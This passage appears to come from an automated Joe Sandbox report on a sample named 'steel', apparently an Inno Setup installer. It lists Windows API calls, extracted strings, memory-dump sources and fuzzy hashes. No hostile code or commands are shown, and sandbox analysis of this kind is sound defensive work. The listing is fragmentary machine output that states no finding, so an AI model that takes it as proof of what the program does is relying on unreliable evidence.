                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                            • String ID: c:\directory$shell32.dll$%H
                                                                                            • API String ID: 3376378930-166502273
                                                                                            • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                            • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                            • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F58F
                                                                                            • GetFocus.USER32 ref: 0042F597
                                                                                            • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                            • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                            • String ID: TWindowDisabler-Window
                                                                                            • API String ID: 3167913817-1824977358
                                                                                            • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                            • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                            • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                            • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                            • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                            APIs
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                            • API String ID: 4130936913-2943970505
                                                                                            • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                            • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                            • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                              • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                              • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                              • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                              • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                            • API String ID: 854858120-615399546
                                                                                            • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                            • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                            • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                            APIs
                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                            • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                            • String ID: 2$MAINICON
                                                                                            • API String ID: 3935243913-3181700818
                                                                                            • Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                            • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                            • Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                            • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                              • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                              • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                              • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                              • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                              • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                              • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                              • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                              • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                              • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                              • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                            • API String ID: 316262546-2767913252
                                                                                            • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                            • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID:
                                                                                            • API String ID: 3887896539-0
                                                                                            • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                            • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                            Strings
                                                                                            • WININIT.INI, xrefs: 004557E4
                                                                                            • PendingFileRenameOperations2, xrefs: 00455784
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                            • PendingFileRenameOperations, xrefs: 00455754
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                            • API String ID: 47109696-2199428270
                                                                                            • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                            • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                            • API String ID: 1375471231-2952887711
                                                                                            • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                            • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                            APIs
                                                                                            • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                            • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnumLongWindows
                                                                                            • String ID: \AB
                                                                                            • API String ID: 4191631535-3948367934
                                                                                            • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                            • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                            • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                            • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                            APIs
                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                            • API String ID: 588496660-1846899949
                                                                                            • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                            • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                            • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                            • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                            Strings
                                                                                            • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                            • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                            • NextButtonClick, xrefs: 0046BC4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                            • API String ID: 0-2329492092
                                                                                            • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                            • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                            • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                            • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
